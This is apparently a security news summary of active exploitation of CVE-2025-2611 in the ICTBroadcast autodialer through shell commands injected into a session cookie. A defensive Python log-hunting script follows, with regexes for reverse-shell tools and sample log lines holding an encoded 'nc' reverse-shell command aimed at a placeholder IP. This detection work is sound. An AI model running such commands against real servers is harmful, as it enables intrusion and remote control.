ICTBroadcast autodialer software exploited to gain remote shell access

1 unique source, 1 article

Summary

A critical security flaw in ICTBroadcast, autodialer software from ICT Innovations, is being actively exploited in the wild. The vulnerability, CVE-2025-2611, allows unauthenticated remote code execution due to improper input validation of session cookie data. It affects ICTBroadcast versions 7.4 and below, with approximately 200 online instances exposed. Attackers inject shell commands into the BROADCAST cookie, which are then executed on the vulnerable server, giving them remote shell access. The attacks occur in two phases: a time-based exploit check, followed by attempts to set up reverse shells. The attackers use a Base64-encoded command to confirm command execution and establish reverse shells.

Timeline

  1. 15.10.2025 09:16 · 1 article

    ICTBroadcast servers exploited to gain remote shell access

    On October 11, 2025, exploitation of CVE-2025-2611 in ICTBroadcast was detected. The attacks involve injecting shell commands into the BROADCAST cookie to gain remote shell access. The exploitation occurs in two phases: a time-based exploit check followed by attempts to set up reverse shells. The attackers use a Base64-encoded command to confirm command execution and establish reverse shells. The use of a localto[.]net URL and the IP address 143.47.53[.]106 in the payloads suggests possible reuse or shared tooling with a previous campaign distributing the Ratty RAT.

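The two phases described above can be hunted for in web server logs. The following Python sketch is an added example, not code from the source article or the vendor: it decodes the BROADCAST cookie and labels each hit by phase. It assumes the server logs the Cookie header as the last quoted field and that the Base64-encoded command sits inside the cookie value; the signature lists, the `_b64` helper and the sample log lines are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Signatures for the two phases in the summary; the token lists are assumptions.
PHASES = {
    "timing-check": re.compile(r"\bsleep\s+\d+"),
    "reverse-shell": re.compile(r"/dev/tcp/|\b(?:nc|ncat|mkfifo)\b|\bbash\s+-i\b"),
}
COOKIE_RE = re.compile(r"\bBROADCAST=([^;\s\"]+)")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")

def decoded_views(value):
    """Return the URL-decoded cookie value plus every Base64 run that decodes to ASCII."""
    raw = unquote(value)
    views = [raw]
    for run in B64_RUN.findall(raw):
        try:
            text = base64.b64decode(run, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # opaque session tokens normally end up here
        if text.isprintable():
            views.append(text)
    return views

def classify(log_line):
    """Return (phase, decoded_text) hits for the BROADCAST cookie in one log line."""
    match = COOKIE_RE.search(log_line)
    if not match:
        return []
    return [(phase, view)
            for view in decoded_views(match.group(1))
            for phase, rx in PHASES.items() if rx.search(view)]

def _b64(cmd):
    # Hypothetical helper: builds a URL-encoded Base64 cookie value for the samples.
    return base64.b64encode(cmd.encode()).decode().replace("=", "%3D")

# Constructed log lines (documentation IPs, stand-in commands, cookie as last field).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Oct/2025:08:01:02 +0000] "GET / HTTP/1.1" 200 "BROADCAST=0f3a9c1e5b7d2a4c6e8f0a1b2c3d4e5f"',
    f'198.51.100.7 - - [11/Oct/2025:08:03:10 +0000] "GET / HTTP/1.1" 200 "BROADCAST={_b64("sleep 3")}"',
    f'198.51.100.7 - - [11/Oct/2025:08:04:41 +0000] "GET / HTTP/1.1" 200 "BROADCAST={_b64("nc 203.0.113.9 4444")}"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for phase, text in classify(line):
            print(f"{line.split()[0]} {phase}: {text!r}")
```

A timing-check hit followed by a reverse-shell hit from the same client is the sequence the summary describes, so correlating hits by source address raises confidence.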

Information Snippets